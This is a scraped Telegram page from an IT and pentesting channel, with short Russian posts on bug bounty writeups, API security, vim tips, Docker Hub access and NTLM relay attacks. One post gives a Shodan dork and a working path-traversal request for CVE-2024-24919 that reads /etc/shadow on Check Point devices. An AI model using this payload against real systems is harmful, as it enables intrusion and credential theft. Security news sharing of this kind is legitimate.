cookie

ما از کوکی‌ها برای بهبود تجربه مرور شما استفاده می‌کنیم. با کلیک کردن بر روی «پذیرش همه»، شما با استفاده از کوکی‌ها موافقت می‌کنید.

avatar

Andrey Galdin

Личный блог ИТ-эксперта.

نمایش بیشتر
پست‌های تبلیغاتی
6 746
مشترکین
-9424 ساعت
-1 0667 روز
-8 35930 روز

در حال بارگیری داده...

معدل نمو المشتركين

در حال بارگیری داده...

Photo unavailableShow in Telegram
🧑‍💻 Статьи для IT: как объяснять и распространять значимые идеи Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом. Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций. Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах. 👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
نمایش همه...
Photo unavailableShow in Telegram
💵203 000 за 4 уязвимости в боте Azure Health Обзор двух RCE, path traversal и memory leak от канала Bug Bounty Reports Explained. Кратко, ёмко и по делу👇 👀 Смотреть #writeup #pentest #bugbounty
نمایش همه...
Photo unavailableShow in Telegram
🤖 Web Apps: APIs’ Nightmare — доклад исследователя и пентестера Paulo Silva, посвященный трансформации веб-приложений. Автор проведет вас по пути от традиционной архитектуры к современным парадигмам. Вы узнаете, как: ☑️ Традиционные приложения полагались на отдельные файлы, получаемые с помощью HTTP-запросов, в то время как современные объединяют код в пакеты и используют API для создания динамического контента. ☑️ Мобильные приложения, IoT и веб-приложения взаимодействуют через API. Кроме того, вы получите представление о 10 основных рисках безопасности API OWASP + ценные ресурсы для безопасной разработки API. 📺 Смотреть #pentest #bugbounty
نمایش همه...
00:14
Video unavailableShow in Telegram
#vim позволяет использовать любой разделитель регулярных выражений при замене шаблона. Нет необходимости использовать /, попробуйте вместо этого #:
:s#/usr/local/bin#/usr/sbin#g 
Это позволяет избежать экранирования символа /. #tips
نمایش همه...
H_UHH30OADSXCqrL.mp40.91 KB
Photo unavailableShow in Telegram
🔥 Упрощение поиска и эксплуатации уязвимостей HTTP desync с помощью TRACE Исследователь из PortSwigger рассматривает новую технику эксплуатации, которую можно использовать для полной компрометации веб-приложения с помощью TRACE — древнего метода HTTP, который поддерживается более широко, чем вы думаете.  👉 Читать #bugbounty #pentest #tools
نمایش همه...
Photo unavailableShow in Telegram
💻⌛ 8 причин участвовать в хакатонах Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно! 👉 Читать статью 👉 Зеркало 📌 Другие материалы по теме: 💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии 🔥 12 признаков выгорания или как понять, что вам пора в отпуск 🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов 🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
نمایش همه...
00:09
Video unavailableShow in Telegram
👩‍💻 Полезный способ получить лучшее представление о коде, окружающем текущую строку в #vim: • zt — измените положение области просмотра так, чтобы текущая строка находилась вверхуzzпосередине zbвнизу 👉 Подробнее
نمایش همه...
GOwBqZ1WUAE0zhV.mp41.51 KB
Photo unavailableShow in Telegram
🐳✈️ Docker ушёл из РФ! Инструкция по восстановлению доступа к Docker Hub для пользователей из России Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала. 🔗 Читать статью 🔗 Зеркало
نمایش همه...
Photo unavailableShow in Telegram
Все пишут про CVE-2024-24919, и мы напишем. 🔍 Дорк для Shodan: title:"Check Point" ssl:"target" Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow
#CVE
نمایش همه...
🥷 Изучение необычных методов атаки на NTLM relay Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят: 1️⃣ Enumerating Domain Usernames via a Non-Admin SMB Relay 2️⃣ Relaying to Microsoft SQL Server 3️⃣ Relaying to LDAP and Configuring Resource-Based Delegation 4️⃣ Shadow Credentials Attack with no Prior Credentials 5️⃣ Shadow Credentials Attack Using Prior Credentials #pentest #redteam
نمایش همه...
Beyond the Basics: Exploring Uncommon NTLM Relay Attack Techniques

Threat & Attack Simulation Technical Lead Kevin Murphy details 5 lesser-known NTLM relay attacks that have to help you penetration test your networks.